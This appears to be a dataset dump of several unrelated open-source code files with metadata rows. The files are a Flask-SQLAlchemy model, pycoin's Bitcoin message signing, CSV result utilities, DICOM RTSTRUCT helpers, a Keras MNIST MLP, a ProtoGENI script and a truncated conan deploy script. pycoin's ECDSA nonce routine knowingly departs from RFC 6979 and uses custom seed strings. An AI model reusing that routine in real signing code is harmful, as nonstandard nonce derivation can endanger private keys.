__table_args__ = {'extend_existing': True}
__tablename__ = 'fuec'
id = db.Column(db.Integer, primary_key=True)
created_at = db.Column(db.DateTime, default=db.func.current_timestamp())
created_by = db.Column(db.Integer, db.ForeignKey('user.id'))
no_fuec = db.Column(db.String(20))
social_object = db.Column(db.String(255), nullable=False)
nit = db.Column(db.String(255))
no_agreement = db.Column(db.Integer)
contractor = db.Column(db.String(255))
id_contractor = db.Column(db.Integer)
object_agreement = db.Column(db.String(255))
origin_destination = db.Column(db.String(1000))
kind_hiring = db.Column(db.String(255))
kind_link = db.Column(db.String(255))
init_date = db.Column(db.String(255))
last_date = db.Column(db.String(255))
car_no = db.Column(db.Integer)
car_license_plate = db.Column(db.String(255))
car_model = db.Column(db.String(255))
car_brand = db.Column(db.String(255))
car_class_car = db.Column(db.Integer)
car_operation = db.Column(db.String(255))
data_driver_json = db.Column(db.String(1000))
contractor_owner = db.Column(db.String(1000))
file_pdf = db.Column(db.LargeBinary)
def __init__(self,
no_fuec,
created_by,
social_object,
nit,
no_agreement,
contractor,
id_contractor,
object_agreement,
origin_destination,
kind_hiring,
kind_link,
init_date,
last_date,
car_no,
car_license_plate,
car_model,
car_brand,
car_class_car,
car_operation,
data_driver,
contractor_owner,
file_pdf):
if no_fuec:
self.no_fuec = no_fuec
if created_by:
self.created_by = created_by
if social_object:
self.social_object = social_object.lower()
if nit:
self.nit = nit
if no_agreement:
self.no_agreement = no_agreement
if contractor:
self.contractor = contractor
if id_contractor:
self.id_contractor = id_contractor
if object_agreement:
self.object_agreement = object_agreement
if origin_destination:
self.origin_destination = origin_destination
if kind_hiring:
self.kind_hiring = kind_hiring
if kind_link:
self.kind_link = kind_link
if init_date:
self.init_date = init_date
if last_date:
self.last_date = last_date
if car_no:
self.car_no = car_no
if car_license_plate:
self.car_license_plate = car_license_plate
if car_model:
self.car_model = car_model
if car_brand:
self.car_brand = car_brand
if car_class_car:
self.car_class_car = car_class_car
if car_operation:
self.car_operation = car_operation
if data_driver:
self.data_driver_json = data_driver
if contractor_owner:
self.contractor_owner = contractor_owner
if file_pdf:
self.file_pdf = file_pdf
|
gpl-3.0
| 7,552,208,850,233,082,000
| 31.292453
| 76
| 0.544126
| false
| 3.735808
| false
| false
| false
|
moocowmoo/pycoin
|
pycoin/contrib/msg_signing.py
|
1
|
11785
|
import hashlib
import hmac
import io
import os
import re
from binascii import b2a_base64, a2b_base64
from .. import ecdsa
from ..serialize.bitcoin_streamer import stream_bc_string
from ..ecdsa import ellipticcurve, numbertheory
from ..networks import address_prefix_for_netcode, network_name_for_netcode
from ..encoding import public_pair_to_bitcoin_address, to_bytes_32, from_bytes_32, double_sha256
from ..key import Key
# According to brainwallet, this is "inputs.io" format, but it seems practical
# and is deployed in the wild. Core bitcoin doesn't offer a message wrapper like this.
signature_template = '''\
-----BEGIN {net_name} SIGNED MESSAGE-----
{msg}
-----BEGIN SIGNATURE-----
{addr}
{sig}
-----END {net_name} SIGNED MESSAGE-----'''
def parse_signed_message(msg_in):
"""
Take an "armoured" message and split into the message body, signing address
and the base64 signature. Should work on all altcoin networks, and should
accept both Inputs.IO and Multibit formats but not Armory.
Looks like RFC2440 <https://www.ietf.org/rfc/rfc2440.txt> was an "inspiration"
for this, so in case of confusion it's a reference, but I've never found
a real spec for this. Should be a BIP really.
"""
# Convert to Unix line feeds from DOS style, iff we find them, but
# restore to same at the end. The RFC implies we should be using
# DOS \r\n in the message, but that does not always happen in today's
# world of MacOS and Linux devs. A mix of types will not work here.
dos_nl = ('\r\n' in msg_in)
if dos_nl:
msg_in = msg_in.replace('\r\n', '\n')
try:
# trim any junk in front
_, body = msg_in.split('SIGNED MESSAGE-----\n', 1)
except:
raise ValueError("expecting text SIGNED MESSSAGE somewhere")
try:
# - sometimes middle sep is BEGIN BITCOIN SIGNATURE, other times just BEGIN SIGNATURE
# - choose the last instance, in case someone signs a signed message
parts = re.split('\n-----BEGIN [A-Z ]*SIGNATURE-----\n', body)
msg, hdr = ''.join(parts[:-1]), parts[-1]
except:
raise ValueError("expected BEGIN SIGNATURE line", body)
# after message, expect something like an email/http headers, so split into lines
hdr = list(filter(None, [i.strip() for i in hdr.split('\n')]))
if '-----END' not in hdr[-1]:
raise ValueError("expecting END on last line")
sig = hdr[-2]
addr = None
for l in hdr:
l = l.strip()
if not l:
continue
if l.startswith('-----END'):
break
if ':' in l:
label, value = [i.strip() for i in l.split(':', 1)]
if label.lower() == 'address':
addr = l.split(':')[1].strip()
break
continue
addr = l
break
if not addr or addr == sig:
raise ValueError("Could not find address")
if dos_nl:
msg = msg.replace('\n', '\r\n')
return msg, addr, sig
def sign_message(key, message=None, verbose=False, use_uncompressed=None, msg_hash=None):
"""
Return a signature, encoded in Base64, which can be verified by anyone using the
public key.
"""
secret_exponent = key.secret_exponent()
if not secret_exponent:
raise TypeError("Private key is required to sign a message")
addr = key.address()
netcode = key.netcode()
mhash = hash_for_signing(message, netcode) if message else msg_hash
# Use a deterministic K so our signatures are deterministic.
try:
r, s, y_odd = _my_sign(ecdsa.generator_secp256k1, secret_exponent, mhash)
except RuntimeError:
# .. except if extremely unlucky
k = from_bytes_32(os.urandom(32))
r, s, y_odd = _my_sign(ecdsa.generator_secp256k1, secret_exponent, mhash, _k=k)
is_compressed = not key._use_uncompressed(use_uncompressed)
assert y_odd in (0, 1)
# See http://bitcoin.stackexchange.com/questions/14263
# for discussion of the proprietary format used for the signature
#
# Also from key.cpp:
#
# The header byte: 0x1B = first key with even y, 0x1C = first key with odd y,
# 0x1D = second key with even y, 0x1E = second key with odd y,
# add 0x04 for compressed keys.
first = 27 + y_odd + (4 if is_compressed else 0)
sig = b2a_base64(bytearray([first]) + to_bytes_32(r) + to_bytes_32(s)).strip()
if not isinstance(sig, str):
# python3 b2a wrongness
sig = str(sig, 'ascii')
if not verbose or message is None:
return sig
return signature_template.format(
msg=message, sig=sig, addr=addr,
net_name=network_name_for_netcode(netcode).upper())
def verify_message(key_or_address, signature, message=None, msg_hash=None, netcode=None):
"""
Take a signature, encoded in Base64, and verify it against a
key object (which implies the public key),
or a specific base58-encoded pubkey hash.
"""
if isinstance(key_or_address, Key):
# they gave us a private key or a public key already loaded.
key = key_or_address
else:
key = Key.from_text(key_or_address)
netcode = netcode or key.netcode()
try:
# Decode base64 and a bitmask in first byte.
is_compressed, recid, r, s = _decode_signature(signature)
except ValueError:
return False
# Calculate hash of message used in signature
mhash = hash_for_signing(message, netcode) if message is not None else msg_hash
# Calculate the specific public key used to sign this message.
pair = _extract_public_pair(ecdsa.generator_secp256k1, recid, r, s, mhash)
# Check signing public pair is the one expected for the signature. It must be an
# exact match for this key's public pair... or else we are looking at a validly
# signed message, but signed by some other key.
#
pp = key.public_pair()
if pp:
# expect an exact match for public pair.
return pp == pair
else:
# Key() constructed from a hash of pubkey doesn't know the exact public pair, so
# must compare hashed addresses instead.
addr = key.address()
prefix = address_prefix_for_netcode(netcode)
ta = public_pair_to_bitcoin_address(pair, compressed=is_compressed, address_prefix=prefix)
return ta == addr
def msg_magic_for_netcode(netcode):
"""
We need the constant "strMessageMagic" in C++ source code, from file "main.cpp"
It is not shown as part of the signed message, but it is prefixed to the message
as part of calculating the hash of the message (for signature). It's also what
prevents a message signature from ever being a valid signature for a transaction.
Each altcoin finds and changes this string... But just simple substitution.
"""
name = network_name_for_netcode(netcode)
if netcode in ('BLK', 'BC'):
name = "BlackCoin" # NOTE: we need this particular HumpCase
# testnet, the first altcoin, didn't change header
if netcode == 'XTN':
name = "Bitcoin"
return '%s Signed Message:\n' % name
def _decode_signature(signature):
"""
Decode the internal fields of the base64-encoded signature.
"""
if signature[0] not in ('G', 'H', 'I'):
# Because we know the first char is in range(27, 35), we know
# valid first character is in this set.
raise TypeError("Expected base64 value as signature", signature)
# base 64 decode
sig = a2b_base64(signature)
if len(sig) != 65:
raise ValueError("Wrong length, expected 65")
# split into the parts.
first = ord(sig[0:1])  # py3 accommodation
r = from_bytes_32(sig[1:33])
s = from_bytes_32(sig[33:33+32])
# first byte encodes a bits we need to know about the point used in signature
if not (27 <= first < 35):
raise ValueError("First byte out of range")
# NOTE: The first byte encodes the "recovery id", or "recid" which is a 3-bit values
# which selects compressed/not-compressed and one of 4 possible public pairs.
#
first -= 27
is_compressed = bool(first & 0x4)
return is_compressed, (first & 0x3), r, s
def _extract_public_pair(generator, recid, r, s, value):
"""
Using the already-decoded parameters of the bitcoin signature,
return the specific public key pair used to sign this message.
Caller must verify this pubkey is what was expected.
"""
assert 0 <= recid < 4, recid
G = generator
n = G.order()
curve = G.curve()
order = G.order()
p = curve.p()
x = r + (n * (recid // 2))
alpha = (pow(x, 3, p) + curve.a() * x + curve.b()) % p
beta = numbertheory.modular_sqrt(alpha, p)
inv_r = numbertheory.inverse_mod(r, order)
y = beta if ((beta - recid) % 2 == 0) else (p - beta)
minus_e = -value % order
R = ellipticcurve.Point(curve, x, y, order)
Q = inv_r * (s * R + minus_e * G)
public_pair = (Q.x(), Q.y())
# check that this is the RIGHT public key? No. Leave that for the caller.
return public_pair
def hash_for_signing(msg, netcode='BTC'):
"""
Return a hash of msg, according to odd bitcoin method: double SHA256 over a bitcoin
encoded stream of two strings: a fixed magic prefix and the actual message.
"""
magic = msg_magic_for_netcode(netcode)
fd = io.BytesIO()
stream_bc_string(fd, bytearray(magic, 'ascii'))
stream_bc_string(fd, bytearray(msg, 'utf-8'))
# return as a number, since it's an input to signing algos like that anyway
return from_bytes_32(double_sha256(fd.getvalue()))
def deterministic_make_k(generator_order, secret_exponent, val,
hash_f=hashlib.sha256, trust_no_one=True):
"""
Generate K value BUT NOT according to https://tools.ietf.org/html/rfc6979
ecsda.deterministic_generate_k() was more general than it needs to be,
and I felt the hand of NSA in the wholly constants, so I simplified and
changed the salt.
"""
n = generator_order
assert hash_f().digest_size == 32
# code below has been specialized for SHA256 / bitcoin usage
assert n.bit_length() == 256
hash_size = 32
if trust_no_one:
v = b"Edward Snowden rocks the world!!"
k = b"Qwest CEO Joseph Nacchio is free"
else:
v = b'\x01' * hash_size
k = b'\x00' * hash_size
priv = to_bytes_32(secret_exponent)
if val > n:
val -= n
h1 = to_bytes_32(val)
k = hmac.new(k, v + b'\x00' + priv + h1, hash_f).digest()
v = hmac.new(k, v, hash_f).digest()
k = hmac.new(k, v + b'\x01' + priv + h1, hash_f).digest()
v = hmac.new(k, v, hash_f).digest()
while 1:
t = hmac.new(k, v, hash_f).digest()
k1 = from_bytes_32(t)
if k1 >= 1 and k1 < n:
return k1
k = hmac.new(k, v + b'\x00', hash_f).digest()
v = hmac.new(k, v, hash_f).digest()
def _my_sign(generator, secret_exponent, val, _k=None):
"""
Return a signature for the provided hash (val), using the provided
random nonce, _k or generate a deterministic K as needed.
May raise RuntimeError, in which case retrying with a new
random value k is in order.
"""
G = generator
n = G.order()
k = _k or deterministic_make_k(n, secret_exponent, val)
p1 = k * G
r = p1.x()
if r == 0:
raise RuntimeError("amazingly unlucky random number r")
s = (numbertheory.inverse_mod(k, n) *
(val + (secret_exponent * r) % n)) % n
if s == 0:
raise RuntimeError("amazingly unlucky random number s")
return (r, s, p1.y() % 2)
# EOF
|
mit
| 2,836,944,414,860,314,600
| 31.376374
| 98
| 0.623929
| false
| 3.561499
| false
| false
| false
|
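A hedged round-trip sketch using the helpers above together with pycoin's Key class; the secret exponent is a throwaway demo value.
# Hedged example: sign a message with a private key, then verify it two ways.
from pycoin.key import Key
from pycoin.contrib.msg_signing import sign_message, verify_message
key = Key(secret_exponent=1, netcode="BTC")     # demo key, never use for real funds
msg = "Hello from pycoin"
sig = sign_message(key, msg)                    # base64 signature string
print(sig)
print(verify_message(key, sig, msg))            # True, exact public pair match
print(verify_message(key.address(), sig, msg))  # True, recovered key hashes to the address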
google/telluride_decoding
|
telluride_decoding/csv_util.py
|
1
|
5394
|
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities to save results to a CSV file.
Each row in the CSV file represents results for one regularization value.
The first column in each row is the regularization value, the rest of the
columns are correlation numbers for the experiments.
"""
import collections
import csv
import os
import numpy as np
from telluride_decoding import plot_util
import tensorflow.compat.v2 as tf
# User should call tf.compat.v1.enable_v2_behavior()
def write_results(file_name, regularization_list, all_results):
""""Writes results to a CSV file.
Args:
file_name: The name of the CSV file to write the results.
regularization_list: A list of the regularization values.
all_results: The correlation results as a 2D array. This results is
generated by regression.py. The first dimension is for each
regularization value, the second dimension is for each tf record file used
for testing.
"""
if len(regularization_list) != len(all_results):
raise ValueError('Length of regularization list and results do no match.')
base_dir = os.path.split(file_name)[0]
if base_dir and not tf.io.gfile.exists(base_dir):
tf.io.gfile.makedirs(base_dir)
with tf.io.gfile.GFile(file_name, 'w') as csv_file:
csv_writer = csv.writer(csv_file)
for i, regularization in enumerate(regularization_list):
row = [str(regularization),]
row.extend([str(value) for value in all_results[i]])
csv_writer.writerow(row)
def _read_results(file_name, skip_header=False):
""""Reads results from a CSV file.
Args:
file_name: The name of the CSV file to read the results.
skip_header: Skip the first line when it is a header.
Returns:
An ordered dictionary with regularization values as the keys and the
correlation results as the values.
"""
results = collections.OrderedDict()
with tf.io.gfile.GFile(file_name, 'r') as csv_file:
content = list(csv.reader(csv_file))
if skip_header:
del content[0]
for row in content:
if len(row) < 2:
raise ValueError('Row %s does not have enough columns.' % row)
regularization_value = row[0]
correlations = row[1:]
results[float(regularization_value)] = [float(c) for c in correlations]
return results
def read_all_results_from_directory(dir_name, skip_header=False, pattern=''):
"""Reads results from all the CSV files in a directory.
Args:
dir_name: A name of the directory with all the CSV files.
skip_header: Skip the first line when it is a header.
pattern: Substring that must be in the files to read.
Returns:
An ordered dictionary with regularization values as the keys and the
correlation results as the values.
"""
all_results = collections.OrderedDict()
file_names = tf.io.gfile.listdir(dir_name)
for name in file_names:
if not name.endswith('csv') or pattern not in name:
continue
curr_name = os.path.join(dir_name, name)
curr_results = _read_results(curr_name, skip_header)
if not all_results:
all_results = curr_results
continue
if all_results.keys() != curr_results.keys():
raise ValueError(
'Files do not have the same regularization values %s vs %s' %
(all_results.keys(), curr_results.keys()))
for regularization_value, correlations in curr_results.items():
all_results[regularization_value].extend(correlations)
return all_results
def plot_csv_results(test_name,
results,
golden_mean_std_dict=None,
png_file_name=None,
show_plot=False):
"""Calculates the mean and standard deviation from the results and plot them.
Args:
test_name: The name of the test that will show in the title of the plot.
results: An ordered dictionary with regularization values as the keys and
the correlation results as the values.
golden_mean_std_dict: The golden results as an ordered dictionary with the
regularization values as the keys and tuples with mean value and standard
      deviations as the values.
png_file_name: If file name is not empty, save the plot to the PNG file.
show_plot: If true, show the plot in a window.
"""
regularization_list = []
mean_list = []
std_list = []
for regularization_value in results.keys():
regularization_list.append(regularization_value)
correlations = results[regularization_value]
mean_list.append(np.mean(correlations))
std_list.append(np.std(correlations))
plot_util.plot_mean_std(
test_name,
regularization_list,
mean_list,
std_list,
golden_mean_std_dict=golden_mean_std_dict,
png_file_name=png_file_name,
show_plot=show_plot)
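# Illustrative, hedged usage sketch (not part of the public API): a minimal
# round trip through the helpers above. The file path, regularization values
# and correlation numbers below are made-up placeholders.
def _example_round_trip(csv_path='/tmp/example_results.csv'):
  """Writes dummy results, reads them back and plots mean/std per value."""
  write_results(csv_path, [1e-3, 1e-2], [[0.1, 0.2, 0.3], [0.2, 0.3, 0.4]])
  results = _read_results(csv_path)
  plot_csv_results('example test', results,
                   png_file_name='/tmp/example_results.png')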
|
apache-2.0
| -7,502,328,681,272,178,000
| 35.945205
| 80
| 0.688172
| false
| 3.957447
| false
| false
| false
|
qurit/rt-utils
|
rt_utils/ds_helper.py
|
1
|
8750
|
import datetime
from rt_utils.image_helper import get_contours_coords
from rt_utils.utils import ROIData, SOPClassUID
import numpy as np
from pydicom.uid import generate_uid
from pydicom.dataset import Dataset, FileDataset, FileMetaDataset
from pydicom.sequence import Sequence
from pydicom.uid import ImplicitVRLittleEndian
"""
File contains helper methods that handles DICOM header creation/formatting
"""
def create_rtstruct_dataset(series_data) -> FileDataset:
ds = generate_base_dataset()
add_study_and_series_information(ds, series_data)
add_patient_information(ds, series_data)
add_refd_frame_of_ref_sequence(ds, series_data)
return ds
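# Illustrative, hedged sketch (not part of rt-utils' public API): shows how
# the dataset built above is typically saved to disk. Loading the referenced
# image series is simplified here; the real library discovers, sorts and
# validates the series via image_helper, so `dicom_dir` and the plain glob
# below are assumptions made for demonstration purposes only.
def _example_create_and_save(dicom_dir, out_path='rtstruct.dcm'):
    import glob
    import os
    import pydicom
    series_data = [pydicom.dcmread(f)
                   for f in sorted(glob.glob(os.path.join(dicom_dir, '*.dcm')))]
    ds = create_rtstruct_dataset(series_data)
    ds.save_as(out_path)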
def generate_base_dataset() -> FileDataset:
file_name = 'rt-utils-struct'
file_meta = get_file_meta()
ds = FileDataset(file_name, {}, file_meta=file_meta, preamble=b"\0" * 128)
add_required_elements_to_ds(ds)
add_sequence_lists_to_ds(ds)
return ds
def get_file_meta() -> FileMetaDataset:
file_meta = FileMetaDataset()
file_meta.FileMetaInformationGroupLength = 202
file_meta.FileMetaInformationVersion = b'\x00\x01'
file_meta.TransferSyntaxUID = ImplicitVRLittleEndian
file_meta.MediaStorageSOPClassUID = SOPClassUID.RTSTRUCT
    file_meta.MediaStorageSOPInstanceUID = generate_uid() # TODO find out if random generation is fine
file_meta.ImplementationClassUID = SOPClassUID.RTSTRUCT_IMPLEMENTATION_CLASS
return file_meta
def add_required_elements_to_ds(ds: FileDataset):
dt = datetime.datetime.now()
    # Append data elements required by the DICOM standard
ds.SpecificCharacterSet = 'ISO_IR 100'
ds.InstanceCreationDate = dt.strftime('%Y%m%d')
ds.InstanceCreationTime = dt.strftime('%H%M%S.%f')
ds.StructureSetLabel = 'RTstruct'
ds.StructureSetDate = dt.strftime('%Y%m%d')
ds.StructureSetTime = dt.strftime('%H%M%S.%f')
ds.Modality = 'RTSTRUCT'
ds.Manufacturer = 'Qurit'
ds.ManufacturerModelName = 'rt-utils'
ds.InstitutionName = 'Qurit'
# Set the transfer syntax
ds.is_little_endian = True
ds.is_implicit_VR = True
# Set values already defined in the file meta
ds.SOPClassUID = ds.file_meta.MediaStorageSOPClassUID
ds.SOPInstanceUID = ds.file_meta.MediaStorageSOPInstanceUID
ds.ApprovalStatus = 'UNAPPROVED'
def add_sequence_lists_to_ds(ds: FileDataset):
ds.StructureSetROISequence = Sequence()
ds.ROIContourSequence = Sequence()
ds.RTROIObservationsSequence = Sequence()
def add_study_and_series_information(ds: FileDataset, series_data):
reference_ds = series_data[0] # All elements in series should have the same data
ds.StudyDate = reference_ds.StudyDate
ds.SeriesDate = getattr(reference_ds, 'SeriesDate', '')
ds.StudyTime = reference_ds.StudyTime
ds.SeriesTime = getattr(reference_ds, 'SeriesTime', '')
ds.StudyDescription = getattr(reference_ds, 'StudyDescription', '')
ds.SeriesDescription = getattr(reference_ds, 'SeriesDescription', '')
ds.StudyInstanceUID = reference_ds.StudyInstanceUID
ds.SeriesInstanceUID = generate_uid() # TODO: find out if random generation is ok
ds.StudyID = reference_ds.StudyID
ds.SeriesNumber = "1" # TODO: find out if we can just use 1 (Should be fine since its a new series)
def add_patient_information(ds: FileDataset, series_data):
reference_ds = series_data[0] # All elements in series should have the same data
ds.PatientName = getattr(reference_ds, 'PatientName', '')
ds.PatientID = getattr(reference_ds, 'PatientID', '')
ds.PatientBirthDate = getattr(reference_ds, 'PatientBirthDate', '')
ds.PatientSex = getattr(reference_ds, 'PatientSex', '')
ds.PatientAge = getattr(reference_ds, 'PatientAge', '')
ds.PatientSize = getattr(reference_ds, 'PatientSize', '')
ds.PatientWeight = getattr(reference_ds, 'PatientWeight', '')
def add_refd_frame_of_ref_sequence(ds: FileDataset, series_data):
refd_frame_of_ref = Dataset()
refd_frame_of_ref.FrameOfReferenceUID = generate_uid() # TODO Find out if random generation is ok
refd_frame_of_ref.RTReferencedStudySequence = create_frame_of_ref_study_sequence(series_data)
# Add to sequence
ds.ReferencedFrameOfReferenceSequence = Sequence()
ds.ReferencedFrameOfReferenceSequence.append(refd_frame_of_ref)
def create_frame_of_ref_study_sequence(series_data) -> Sequence:
reference_ds = series_data[0] # All elements in series should have the same data
rt_refd_series = Dataset()
rt_refd_series.SeriesInstanceUID = reference_ds.SeriesInstanceUID
rt_refd_series.ContourImageSequence = create_contour_image_sequence(series_data)
rt_refd_series_sequence = Sequence()
rt_refd_series_sequence.append(rt_refd_series)
rt_refd_study = Dataset()
rt_refd_study.ReferencedSOPClassUID = SOPClassUID.DETACHED_STUDY_MANAGEMENT
rt_refd_study.ReferencedSOPInstanceUID = reference_ds.StudyInstanceUID
rt_refd_study.RTReferencedSeriesSequence = rt_refd_series_sequence
rt_refd_study_sequence = Sequence()
rt_refd_study_sequence.append(rt_refd_study)
return rt_refd_study_sequence
def create_contour_image_sequence(series_data) -> Sequence:
contour_image_sequence = Sequence()
# Add each referenced image
for series in series_data:
contour_image = Dataset()
contour_image.ReferencedSOPClassUID = series.file_meta.MediaStorageSOPClassUID
contour_image.ReferencedSOPInstanceUID = series.file_meta.MediaStorageSOPInstanceUID
contour_image_sequence.append(contour_image)
return contour_image_sequence
def create_structure_set_roi(roi_data: ROIData) -> Dataset:
# Structure Set ROI Sequence: Structure Set ROI 1
structure_set_roi = Dataset()
structure_set_roi.ROINumber = roi_data.number
structure_set_roi.ReferencedFrameOfReferenceUID = roi_data.frame_of_reference_uid
structure_set_roi.ROIName = roi_data.name
structure_set_roi.ROIDescription = roi_data.description
structure_set_roi.ROIGenerationAlgorithm = 'MANUAL'
return structure_set_roi
def create_roi_contour(roi_data: ROIData, series_data) -> Dataset:
roi_contour = Dataset()
roi_contour.ROIDisplayColor = roi_data.color
roi_contour.ContourSequence = create_contour_sequence(roi_data, series_data)
roi_contour.ReferencedROINumber = str(roi_data.number)
return roi_contour
def create_contour_sequence(roi_data: ROIData, series_data) -> Sequence:
"""
Iterate through each slice of the mask
For each connected segment within a slice, create a contour
"""
contour_sequence = Sequence()
for i, series_slice in enumerate(series_data):
mask_slice = roi_data.mask[:,:,i]
# Do not add ROI's for blank slices
if np.sum(mask_slice) == 0:
print("Skipping empty mask layer")
continue
contour_coords = get_contours_coords(mask_slice, series_slice, roi_data)
for contour_data in contour_coords:
contour = create_contour(series_slice, contour_data)
contour_sequence.append(contour)
return contour_sequence
def create_contour(series_slice: Dataset, contour_data: np.ndarray) -> Dataset:
contour_image = Dataset()
contour_image.ReferencedSOPClassUID = series_slice.file_meta.MediaStorageSOPClassUID
contour_image.ReferencedSOPInstanceUID = series_slice.file_meta.MediaStorageSOPInstanceUID
# Contour Image Sequence
contour_image_sequence = Sequence()
contour_image_sequence.append(contour_image)
contour = Dataset()
contour.ContourImageSequence = contour_image_sequence
contour.ContourGeometricType = 'CLOSED_PLANAR' # TODO figure out how to get this value
contour.NumberOfContourPoints = len(contour_data) / 3 # Each point has an x, y, and z value
contour.ContourData = contour_data
return contour
def create_rtroi_observation(roi_data: ROIData) -> Dataset:
rtroi_observation = Dataset()
rtroi_observation.ObservationNumber = roi_data.number
rtroi_observation.ReferencedROINumber = roi_data.number
# TODO figure out how to get observation description
rtroi_observation.ROIObservationDescription = 'Type:Soft,Range:*/*,Fill:0,Opacity:0.0,Thickness:1,LineThickness:2,read-only:false'
rtroi_observation.private_creators = 'Qurit Lab'
rtroi_observation.RTROIInterpretedType = ''
rtroi_observation.ROIInterpreter = ''
return rtroi_observation
def get_contour_sequence_by_roi_number(ds, roi_number):
for roi_contour in ds.ROIContourSequence:
# Ensure same type
if str(roi_contour.ReferencedROINumber) == str(roi_number):
return roi_contour.ContourSequence
raise Exception(f"Referenced ROI number '{roi_number}' not found")
|
mit
| -1,413,595,311,255,209,200
| 41.067308
| 134
| 0.729829
| false
| 3.461234
| false
| false
| false
|
roatienza/dl-keras
|
chapter2-neural-networks/mlp-mnist-data_augment-2.1.7.py
|
1
|
3959
|
'''
A MLP network for MNIST digits classification
Project: https://github.com/roatienza/dl-keras
Usage: python3 <this file>
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# numpy package
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Activation
from keras.preprocessing.image import ImageDataGenerator
from keras.datasets import mnist
from keras.utils import to_categorical
# load mnist dataset
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# compute the number of labels
num_labels = np.amax(y_train) + 1
# convert to one-hot vector
y_train = to_categorical(y_train)
y_test = to_categorical(y_test)
# image dimensions (assumed square)
image_size = x_train.shape[1]
input_size = image_size * image_size
# we train our network using float data
x_train = x_train.astype('float32') / 255
x_test = x_test.astype('float32') / 255
# network parameters
batch_size = 128
hidden_units = 256
dropout = 0.45
data_augmentation = False
epochs = 20
max_batches = 2 * len(x_train) / batch_size
# this is 3-layer MLP with ReLU after each layer
model = Sequential()
model.add(Dense(hidden_units, input_dim=input_size))
model.add(Activation('relu'))
model.add(Dense(hidden_units))
model.add(Activation('relu'))
model.add(Dense(num_labels))
# this is the output for one-hot vector
model.add(Activation('softmax'))
model.summary()
# loss function for one-hot vector
# use of adam optimizer
# accuracy is good metric for classification tasks
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
# validate the model on test dataset to determine generalization
# score = model.evaluate(x_test, y_test, batch_size=batch_size)
# print("\nTest accuracy: %.1f%%" % (100.0 * score[1]))
# Run training, with or without data augmentation.
if not data_augmentation:
print('Not using data augmentation.')
# train the network no data augmentation
x_train = np.reshape(x_train, [-1, input_size])
model.fit(x_train, y_train, epochs=epochs, batch_size=batch_size)
else:
print('Using real-time data augmentation.')
# This will do preprocessing and realtime data augmentation:
# we need [width, height, channel] dim for data aug
x_train = np.reshape(x_train, [-1, image_size, image_size, 1])
datagen = ImageDataGenerator(
featurewise_center=False, # set input mean to 0 over the dataset
samplewise_center=False, # set each sample mean to 0
featurewise_std_normalization=False, # divide inputs by std of dataset
samplewise_std_normalization=False, # divide each input by its std
zca_whitening=False, # apply ZCA whitening
        rotation_range=5.0, # randomly rotate images by up to 5 degrees
width_shift_range=0.0, # randomly shift images horizontally
height_shift_range=0.0, # randomly shift images vertically
horizontal_flip=False, # randomly flip images
vertical_flip=False) # randomly flip images
# Compute quantities required for featurewise normalization
# (std, mean, and principal components if ZCA whitening is applied).
datagen.fit(x_train)
for e in range(epochs):
batches = 0
for x_batch, y_batch in datagen.flow(x_train, y_train, batch_size=batch_size):
x_batch = np.reshape(x_batch, [-1, input_size])
model.fit(x_batch, y_batch, verbose=0)
batches += 1
print("Epoch %d/%d, Batch %d/%d" % (e+1, epochs, batches, max_batches))
if batches >= max_batches:
# we need to break the loop by hand because
# the generator loops indefinitely
break
# Score trained model.
x_test = np.reshape(x_test, [-1, input_size])
scores = model.evaluate(x_test, y_test, verbose=1)
print('Test loss:', scores[0])
print('Test accuracy:', scores[1])
|
mit
| 4,741,922,929,612,429,000
| 35.657407
| 86
| 0.691589
| false
| 3.488106
| true
| false
| false
|
nmc-probe/emulab-nome
|
protogeni/test/listactiveslivers.py
|
1
|
1713
|
#! /usr/bin/env python
#
# Copyright (c) 2008-2014 University of Utah and the Flux Group.
#
# {{{GENIPUBLIC-LICENSE
#
# GENI Public License
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
#
# }}}
#
#
#
import sys
import pwd
import getopt
import os
import re
import xmlrpclib
from M2Crypto import X509
execfile( "test-common.py" )
if admincredentialfile:
f = open( admincredentialfile )
mycredential = f.read()
f.close()
else:
Fatal("You need to supply an admin credential");
pass
#
# Ask manager for its list.
#
params = {}
params["credentials"] = (mycredential,)
rval,response = do_method("cm", "ListActiveSlivers", params)
if rval:
Fatal("Could not get a list of resources")
pass
print response[ "value" ]
|
agpl-3.0
| -7,036,149,344,814,738,000
| 27.55
| 72
| 0.737303
| false
| 3.652452
| false
| false
| false
|
polysquare/polysquare-ci-scripts
|
ciscripts/deploy/conan/deploy.py
|
1
|
4874
|
# /ciscripts/deploy/conan/deploy.py
#
# Copy directories into place to prepare for publishing conan project
#
# See /LICENCE.md for Copyright information
"""Copy directories into place to prepare for publishing conan project."""
import argparse
import json
import os
from contextlib import contextmanager
try:
from io import StringIO
except ImportError:
from cStringIO import StringIO # suppress(import-error)
def _get_python_container(cont, util, shell):
"""Get a python 3 installation."""
py_ver = util.language_version("python3")
config_python = "setup/project/configure_python.py"
return cont.fetch_and_import(config_python).get(cont,
util,
shell,
py_ver)
def updated_dict(input_dict, update):
"""Apply update to input_dict and return the result."""
